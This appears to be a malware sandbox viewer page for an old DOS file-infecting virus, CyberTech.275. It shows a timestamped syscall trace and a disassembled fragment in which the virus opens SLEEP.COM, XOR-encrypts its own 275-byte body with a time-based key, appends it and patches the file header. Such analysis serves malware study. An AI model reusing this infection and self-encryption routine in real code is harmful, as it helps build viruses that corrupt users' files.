Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.275

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:30.819971526Z 26 PC: 12e5b | Set disk transfer address
2018-12-17T22:50:30.821583545Z 78 PC: 12e65 | Find first file
2018-12-17T22:50:30.82732199Z 67 PC: 12e72 | Get or set file attributes
2018-12-17T22:50:30.833658685Z 67 PC: 12e7a | Get or set file attributes
2018-12-17T22:50:30.852176575Z 61 PC: 12e7f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:30.858697312Z 87 PC: 12e85 | Get or set file date and time
2018-12-17T22:50:30.86025008Z 63 PC: 12e92 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:30.86747842Z 66 PC: 12eb8 | Move file pointer
2018-12-17T22:50:30.868944993Z 44 PC: 12ecb | Get time 0x12ecb: mov byte ptr cs:[bp + 0x19], dl
0x12ed0: lea si, word ptr [bp + 4]
0x12ed4: mov di, 0xfd00
0x12ed7: mov cx, 0x19
0x12eda: rep movsb byte ptr es:[di], byte ptr [si]
0x12edc: lea si, word ptr [bp + 0x1d]
0x12ee0: mov cx, 0xfa
0x12ee3: nop
0x12ee4: lodsb al, byte ptr [si]
0x12ee5: xor al, dl
0x12ee7: stosb byte ptr es:[di], al
0x12ee8: loop 0x12ee4
0x12eea: mov ah, 0x40
0x12eec: mov dx, 0xfd00
0x12eef: mov cx, 0x113
0x12ef2: nop
0x12ef3: int 0x21
0x12ef5: mov ax, 0x4200
0x12ef8: call 0x22eb2
0x12efb: mov ah, 0x40
2018-12-17T22:50:30.871338865Z 64 PC: 12ef5 | Write file or device (Write 275 bytes on handle 5)
2018-12-17T22:50:30.881393911Z 66 PC: 12eb8 | Move file pointer
2018-12-17T22:50:30.885315204Z 64 PC: 12f06 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:30.891865813Z 87 PC: 12f1f | Get or set file date and time
2018-12-17T22:50:30.896032945Z 62 PC: 12f23 | Close file
2018-12-17T22:50:30.90425703Z 67 PC: 12f2c | Get or set file attributes
2018-12-17T22:50:30.915107653Z 26 PC: 12f10 | Set disk transfer address